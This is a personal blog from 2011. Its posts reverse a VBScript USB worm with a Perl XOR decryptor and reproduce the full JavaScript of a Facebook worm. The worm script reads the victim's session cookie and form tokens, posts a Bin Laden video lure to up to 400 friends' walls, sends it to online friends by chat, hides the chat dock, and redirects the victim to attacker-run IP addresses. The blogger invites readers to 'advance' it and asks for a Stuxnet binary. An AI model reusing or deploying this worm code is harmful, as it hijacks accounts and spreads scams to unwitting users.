2011/11/19

Commercial Coding Pt2

Well as the title says this is in reference to my old blog post of coding commercially, well it sucks I have to deal with .NET/c# VB.NET Java, I wake in the middle of the night screaming no no not the VM please let me talk to the hardware please, am scaring the shit out of my wife and my mum is getting pissed cause am always on her windows desktop, reversing something or making some guy or company happy with .NET :/ any ways its shit.

2011/07/22

Reversing the 'yunyun.vbs' virus

Hello I have been bored tired and coding :) as usual. I got a pen drive some time last
year and I realized there was too many 'Thumb.db' files so I vi Thumb.db
and guess what I saw
'www.muslimah.or.id;==================================== my name:Yuyun 1.0

' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then...

Yes that is the yunyun alright coded in Microsoft VBS then I got interested
in the encrypted part of the code, I want to see whats in there.
Te Encryption and decryption routine is using XOR which means its the same
algorithm in and out. Here is the en/decryption routine

hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next

As you can see this is very simple so I wrote a little perl script to decrypt

#!/usr/bin/perl

use strict;
use warnings;

my $vir;
my @vx;
my $line;
my $i;

open (VIR, "+<yunyun.vbs") ||die( "noopeno :(");
while (<VIR>) {
  $line++;
  if (($line eq 47) || ($line > 47)) {
    $vir .= $_;
  }
}
close (VIR);

@vx = split(/ */, $vir);

foreach $i (@vx) {
  print chr(ord($i) ^ 7);
}

I have made it simpler so anyone can learn from it.
Any ways so with that the mystery was unveiled and then mystery 2
There's a part the needs formatting and this virus/worm is really cool at handling
newlines. Anyway you need to format it then translate it here's the code to format

$adv = 'Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-Araf:26)';


$adv =~ s/\>/\n/go;

print $adv;


Ok so uhm that's that, I have more virii/worms but take this for starters
Oh and if anyone has the 'stuxnet' vorm please let me have a binary copy
in tar.gz format.

Next time.

2011/05/06

University of Ghana Website hacked for 2+ years

I complained about University of Ghana being hacked by "someone" and having
cloaked ads inserted into their pages, well it seems no one took notice of this

So am going to loud mouth more details, remember this is not to disgrace or
tarnish the image of the webmaster of the University of Ghana website but it
is to awaken the spleepy and often loud and uneducatated bureaucrats in Ghana
at large. The problem with Ghana is more and more people are beginning to see
the advantages of IT and are greedily trying to squeeze everything out of anyone
that has knowledge or skills in this field.

Your site is hacked!, is a very scary statement and if I should approach them
I would get the you did huh! question which would piss me off and I'll probalbly
slap the shit out of someone in order to avoid that I can blog :)

To verify this absurd claim from moi(laudarch) do the following

its been a while so i just share.

Facebook Worm

Hello its been really long and a lot of things have happened, anyways I would tell you about the later.

What I want to talk about now is a facebook work I got a couple of days ago
I received a mail from a facebook friend and it had a very suspicious title


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

weird huh even CNN didn't show a video so how come this group has it.
The page has been currently re moved. Its funny when these things happen
and people fall for it anyways. it had instructions on copy and paste a javascript
code in your address bar after you are logged in to facebook.

The interesting thing about this worm is how it spreads
it uses the "stupidity" of Humans. Yes stupidity!

I and my brother tried designing a worm on facebook once and we came up
with different algorithms on how to spread using apps mailling
and posting comments, and this all could not be automatic, I even came up
with mozilla extensions to do the job.


The future of worms and viruses is social networking, I watched as the group
grew from 8,000 to 60,000+ in less than two hours now that is power given the
intelligence of the average joe and jane this would work for the next 10 to 15
years.

I copied the javascript code that spread on the victims wall and profile to the
victim's friends et al.

below is the code, learn from it advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");     
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // Close the connection
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // Close the connection
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
document.getElementById('contentArea').innerHTML="
< center>
< img src="http://www.hindustantimes.com/images/loading_gif.gif" />;
Please wait...";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see this worm was written very well with everything happening in the background
thanks to the power of AJAX.

Am going to take time and fully reverse this and add comments on how to extend until then am writing something else :)
oh have to post avirii I have been reversing for some time now :)